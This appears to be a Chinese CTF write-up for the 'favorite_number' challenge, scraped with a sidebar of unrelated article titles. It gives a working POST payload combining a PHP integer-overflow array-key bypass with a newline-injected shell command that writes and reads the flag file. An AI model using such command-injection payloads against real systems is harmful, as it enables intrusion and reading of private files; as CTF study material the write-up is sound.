当前位置:网站首页>攻防世界-favorite_number
攻防世界-favorite_number
2022-08-02 17:13:00 【NCNIPC梅苑】
favorite_number
首先泄露了php的版本
同其他师傅的payload不同的是
我的post数据中多了个分号;
最后是通过写文件打印文件的形式拿到的flag
stuff[4294967296]=admin&stuff[1]=user&num=123%0Aprintf /fla > /tmp/hello %26%26 printf g >> /tmp/hello %26%26 tac `tac /tmp/hello`;
边栏推荐
- golang源码分析(6):sync.Mutex sync.RWMutex
- 【genius_platform软件平台开发】第七十五讲:YUY2转RGB24实现源码
- 打补丁的日子,比写代码的日子难熬多了
- npm install报错Fix the upstream dependency conflict, or retry
- Red and blue against experience sharing: CS from kill posture
- 阿波罗 planning代码-modules\planning\lattice\trajectory_generation\PiecewiseBrakingTrajectoryGenerator类详解
- nacos简单使用
- 一文搞懂│php 中的 DI 依赖注入
- SQL语句基础
- mui中使用多级选择器实现省市区联动
猜你喜欢
随机推荐
ES: export 的用法
文件上传很难搞?10分钟带你学会阿里云OSS对象存储
二舅“反转”了?
阿里云关系型数据库RDS是干嘛额?
白话电子签章原理及风险
SQL Statement Basics
Redis的使用--集群模式
持续交付(一)JenkinsAPI接口调用
罗敏背后是抖音
Cpolar application example of data acquisition equipment
Navicat for mysql破解版安装
每日优鲜倒了,叮咚买菜的春天在哪?
Inconsistency between oracle and mysql statement results
暴跌99.7%后,谁还在买卖「二舅币」?
Nacos配置中心工作原理(超简单)
Oracle 11g rac打完补丁,dbca新建数据库还需要执行应用补丁的sql吗?
golang源码分析(2):Golang context 包
ffmpeg编译后找不到libx264
golang源码分析(8):m、p、g、shedt、sudog
Smart Contract Security - delegatecall (1)